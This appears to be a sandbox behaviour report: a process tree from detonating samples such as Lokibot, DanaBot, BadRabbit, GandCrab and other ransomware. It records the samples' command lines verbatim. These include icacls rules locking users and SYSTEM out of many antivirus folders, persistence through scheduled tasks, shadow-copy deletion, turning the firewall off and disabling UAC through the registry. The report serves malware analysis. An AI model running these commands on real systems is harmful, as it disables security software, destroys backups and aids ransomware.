  [2] C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)
    [3] C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)
        - Modifies file permissions
  [2] C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
    [3] C:\Windows\SysWOW64\icacls.exe
        icacls C:\Programdata\MB3Install /deny System:(F)
        - Modifies file permissions
  [2] C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
    [3] C:\Windows\SysWOW64\icacls.exe
        icacls C:\Programdata\MB3Install /deny Admin:(F)
        - Modifies file permissions
  [2] C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
    [3] C:\Windows\SysWOW64\icacls.exe
        icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
        - Modifies file permissions
  [2] C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
    [3] C:\Windows\SysWOW64\icacls.exe
        icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
        - Modifies file permissions
  [2] C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
    [3] C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
        - Modifies file permissions
  [2] C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
    [3] C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
        - Modifies file permissions
  [2] C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)
    [3] C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)
        - Modifies file permissions
  [2] C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
    [3] C:\Windows\SysWOW64\icacls.exe
        icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
        - Modifies file permissions
  [2] C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
    [3] C:\Windows\SysWOW64\icacls.exe
        icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
        - Modifies file permissions
  [2] C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
    [3] C:\Windows\SysWOW64\icacls.exe
        icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
        - Modifies file permissions
  [2] C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
    [3] C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
        - Modifies file permissions
  [2] C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
    [3] C:\Windows\SysWOW64\icacls.exe
        icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
        - Modifies file permissions
  [2] C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
  [2] C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
    [3] C:\Windows\System32\Conhost.exe
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    [3] C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
        - Modifies file permissions
  [2] C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
    [3] C:\Windows\System32\Conhost.exe
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    [3] C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
        - Modifies file permissions
  [2] C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
    [3] C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
        - Modifies file permissions
  [2] C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
    [3] C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
        - Modifies file permissions
  [2] C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
    [3] C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
        - Modifies file permissions
  [2] C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
    [3] C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
        - Modifies file permissions
  [2] C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
    [3] C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
        - Modifies file permissions
  [2] C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
    [3] C:\Windows\System32\Conhost.exe
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    [3] C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
        - Modifies file permissions
  [2] C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
    [3] C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
        - Modifies file permissions
  [2] C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
    [3] C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
        - Modifies file permissions
  [2] C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
    [3] C:\Windows\SysWOW64\icacls.exe
        icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
        - Modifies file permissions
  [2] C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
    [3] C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
        - Modifies file permissions
  [2] C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
    [3] C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
        - Modifies file permissions
  [2] C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
    [3] C:\Windows\System32\Conhost.exe
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    [3] C:\Windows\SysWOW64\icacls.exe
        icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
        - Modifies file permissions
  [2] C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
    [3] C:\Windows\SysWOW64\icacls.exe
        icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
        - Modifies file permissions
  [2] C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
    [3] C:\Windows\System32\Conhost.exe
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    [3] C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
        - Modifies file permissions
  [2] C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
    [3] C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
        - Modifies file permissions
  [2] C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
    [3] C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
        - Modifies file permissions
  [2] C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
    [3] C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
        - Modifies file permissions
  [2] C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
    [3] C:\Windows\SysWOW64\icacls.exe
        icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
        - Modifies file permissions
  [2] C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
    [3] C:\Windows\SysWOW64\icacls.exe
        icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
        - Modifies file permissions
  [2] C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
    [3] C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
        - Modifies file permissions
  [2] C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
    [3] C:\Windows\System32\Conhost.exe
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    [3] C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
        - Modifies file permissions
  [2] C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
    [3] C:\Windows\SysWOW64\icacls.exe
        icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
        - Modifies file permissions
  [2] C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
    [3] C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
        - Modifies file permissions
  [2] C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
    [3] C:\Windows\System32\Conhost.exe
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    [3] C:\Windows\SysWOW64\icacls.exe
        icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
        - Modifies file permissions
  [2] C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
    [3] C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
        - Modifies file permissions
  [2] C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
    [3] C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
        - Modifies file permissions
  [2] C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
    [3] C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
        - Modifies file permissions
  [2] C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
    [3] C:\Windows\System32\Conhost.exe
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    [3] C:\Windows\SysWOW64\icacls.exe
        icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
        - Modifies file permissions
  [2] C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
    [3] C:\Windows\SysWOW64\icacls.exe
        icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
        - Modifies file permissions
  [2] C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
    [3] C:\Windows\System32\Conhost.exe
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        - Executes dropped EXE
        - Suspicious behavior: SetClipboardViewer
    [3] C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
        - Modifies file permissions
  [2] C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
      - Creates scheduled task(s)
    [3] C:\Windows\System32\Conhost.exe
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  [2] C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
      - Creates scheduled task(s)
[1] C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Stealer\Lokibot.exe
    "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Stealer\Lokibot.exe"
    - Suspicious use of SetThreadContext
    - Suspicious use of AdjustPrivilegeToken
  [2] C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Stealer\Lokibot.exe
      "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Stealer\Lokibot.exe"
      - Accesses Microsoft Outlook profiles
      - outlook_office_path
      - outlook_win_path
[1] C:\ProgramData\Windows\rutserv.exe
    C:\ProgramData\Windows\rutserv.exe
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
  [2] C:\ProgramData\Windows\rfusclient.exe
      C:\ProgramData\Windows\rfusclient.exe /tray
      - Executes dropped EXE
  [2] C:\ProgramData\Windows\rfusclient.exe
      C:\ProgramData\Windows\rfusclient.exe
      - Executes dropped EXE
    [3] C:\ProgramData\Windows\rfusclient.exe
        C:\ProgramData\Windows\rfusclient.exe /tray
[1] C:\Windows\system32\werfault.exe
    werfault.exe /h /shared Global\d020dd71608d4f7f9ff51092e4c815c8 /t 3044 /p 3048
[1] C:\Windows\explorer.exe
    explorer.exe
    - Adds Run key to start application
    - Enumerates connected drives
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - Checks SCSI registry key(s)
    - Modifies Internet Explorer settings
    - Modifies registry class
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
  [2] C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Net-Worm\Opaserv.l.exe
      "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Net-Worm\Opaserv.l.exe"
  [2] C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Net-Worm\EternalRocks.exe
      "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Net-Worm\EternalRocks.exe"
  [2] C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
      "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Temp1_Emotet.zip\TheG0df2ther@Emotet.doc" /o ""
      - Checks processor information in registry
      - Enumerates system info in registry
      - Suspicious behavior: AddClipboardFormatListener
      - Suspicious use of SetWindowsHookEx
  [2] C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Banking-Malware\DanaBot.exe
      "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Banking-Malware\DanaBot.exe"
    [3] C:\Windows\SysWOW64\regsvr32.exe
        C:\Windows\system32\regsvr32.exe -s C:\Users\Admin\Desktop\THE-MA~1\THE-MA~1\BANKIN~1\DanaBot.dll f1 C:\Users\Admin\Desktop\THE-MA~1\THE-MA~1\BANKIN~1\DanaBot.exe@2416
        - Loads dropped DLL
      [4] C:\Windows\SysWOW64\rundll32.exe
          C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\Desktop\THE-MA~1\THE-MA~1\BANKIN~1\DanaBot.dll,f0
          - Blocklisted process makes network request
          - Loads dropped DLL
  [2] C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Banking-Malware\DanaBot.exe
      "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Banking-Malware\DanaBot.exe"
    [3] C:\Windows\System32\Conhost.exe
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        - Executes dropped EXE
  [2] C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\RedEye.exe
      "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\RedEye.exe"
      - Modifies extensions of user files
      - Adds Run key to start application
      - Sets desktop wallpaper using registry
      - Drops file in Windows directory
    [3] C:\Windows\SYSTEM32\vssadmin.exe
        vssadmin delete shadows /all /quiet
        - Interacts with shadow copies
    [3] C:\Windows\SYSTEM32\vssadmin.exe
        vssadmin delete shadows /all /quiet
        - Interacts with shadow copies
    [3] C:\Windows\SYSTEM32\NetSh.exe
        NetSh Advfirewall set allprofiles state off
    [3] C:\Windows\SYSTEM32\vssadmin.exe
        vssadmin delete shadows /all /quiet
        - Interacts with shadow copies
    [3] C:\Windows\System32\shutdown.exe
        "C:\Windows\System32\shutdown.exe" -r -t 00 -f
  [2] C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\satan.exe
      "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\satan.exe"
      - Suspicious use of SetThreadContext
    [3] C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\satan.exe
        "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\satan.exe"
      [4] C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\tmp_489307f4.bat"
        [5] C:\Windows\System32\Conhost.exe
            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      [4] C:\Users\Admin\AppData\Roaming\Bocit\sywe.exe
          "C:\Users\Admin\AppData\Roaming\Bocit\sywe.exe"
          - Executes dropped EXE
          - Suspicious use of SetThreadContext
        [5] C:\Users\Admin\AppData\Roaming\Bocit\sywe.exe
            "C:\Users\Admin\AppData\Roaming\Bocit\sywe.exe"
            - Executes dropped EXE
            - Suspicious use of NtSetInformationThreadHideFromDebugger
  [2] C:\Windows\System32\vssadmin.exe
      "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
      - Interacts with shadow copies
  [2] C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\ViraLock.exe
      "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\ViraLock.exe"
      - Adds Run key to start application
    [3] C:\Users\Admin\fcIYAMws\PioYkUIY.exe
        "C:\Users\Admin\fcIYAMws\PioYkUIY.exe"
        - Executes dropped EXE
        - Checks computer location settings
        - Adds Run key to start application
        - Drops file in System32 directory
    [3] C:\ProgramData\PEkMcMgI\LSwIgkAg.exe
        "C:\ProgramData\PEkMcMgI\LSwIgkAg.exe"
        - Executes dropped EXE
        - Adds Run key to start application
    [3] C:\Windows\SysWOW64\reg.exe
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        - Modifies registry key
    [3] C:\Windows\SysWOW64\reg.exe
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        - Modifies registry key
    [3] C:\Windows\SysWOW64\reg.exe
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        - Modifies registry key
  [2] C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\BadRabbit.exe
      "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\BadRabbit.exe"
      - Drops file in Windows directory
    [3] C:\Windows\SysWOW64\rundll32.exe
        C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
        - Drops file in Windows directory
      [4] C:\Windows\1030.tmp
          "C:\Windows\1030.tmp" \\.\pipe\{7869F017-81C1-410F-97B3-05144B1A9851}
          - Executes dropped EXE
  [2] C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\BadRabbit.exe
      "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\BadRabbit.exe"
      - Drops file in Windows directory
    [3] C:\Windows\SysWOW64\rundll32.exe
        C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
        - Drops file in Windows directory
  [2] C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\Fantom.exe
      "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\Fantom.exe"
      - Drops file in Program Files directory
    [3] C:\Users\Admin\AppData\Local\Temp\WindowsUpdate.exe
        "C:\Users\Admin\AppData\Local\Temp\WindowsUpdate.exe"
        - Executes dropped EXE
        - Suspicious use of NtSetInformationThreadHideFromDebugger
  [2] C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\GandCrab.exe
      "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\GandCrab.exe"
      - Drops startup file
      - Enumerates connected drives
      - Sets desktop wallpaper using registry
      - Drops file in Program Files directory
      - Checks processor information in registry
  [2] C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\InfinityCrypt.exe
      "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\InfinityCrypt.exe"
      - Modifies extensions of user files
      - Drops file in Program Files directory
      - Checks processor information in registry
[1] C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
    "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
    - Drops file in Windows directory
    - Suspicious use of SetWindowsHookEx
[1] C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
    - Drops file in Windows directory
    - Enumerates system info in registry
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
[1] C:\Windows\System32\mobsync.exe
    C:\Windows\System32\mobsync.exe -Embedding
    - Executes dropped EXE
[1] C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
[1] \??\c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
[1] C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
[1] C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /C schtasks /query /fo list
  [2] C:\Windows\SysWOW64\schtasks.exe
      schtasks /query /fo list
      - Drops file in System32 directory
[1] C:\Windows\SysWOW64\timeout.exe
    TIMEOUT /T 5 /NOBREAK
    - Delays execution with timeout.exe
[1] C:\Windows\SysWOW64\icacls.exe
    icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
    - Modifies file permissions
[1] \??\c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k networkservice -s TermService
[1] C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k NetworkService -s TermService
    - Loads dropped DLL
[1] C:\Programdata\RealtekHD\taskhostw.exe
    C:\Programdata\RealtekHD\taskhostw.exe
    - Executes dropped EXE
[1] C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
[1] C:\Windows\system32\DllHost.exe
    C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
    - Suspicious use of NtSetInformationThreadHideFromDebugger
[1] C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k netsvcs -s Browser
    - Modifies data under HKEY_USERS
[1] C:\Windows\system32\DllHost.exe
    C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
    - Suspicious use of NtSetInformationThreadHideFromDebugger
[1] C:\Windows\system32\DllHost.exe
    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  [2] C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 7164 -s 772
      - Program crash
[1] C:\Programdata\RealtekHD\taskhostw.exe
    C:\Programdata\RealtekHD\taskhostw.exe
    - Executes dropped EXE
    - Suspicious use of NtSetInformationThreadHideFromDebugger
[1] C:\Windows\system32\DllHost.exe
    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  [2] C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 1328 -s 744
      - Program crash
[1] C:\Windows\system32\DllHost.exe
    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  [2] C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 4452 -s 744
      - Program crash
[1] C:\Windows\system32\DllHost.exe
    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  [2] C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 6604 -s 736
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Program crash
  [2] C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 6604 -s 748
      - Program crash
[1] C:\Windows\system32\LogonUI.exe
    "LogonUI.exe" /flags:0x0 /state0:0xa3aa6055 /state1:0x41c64e6d
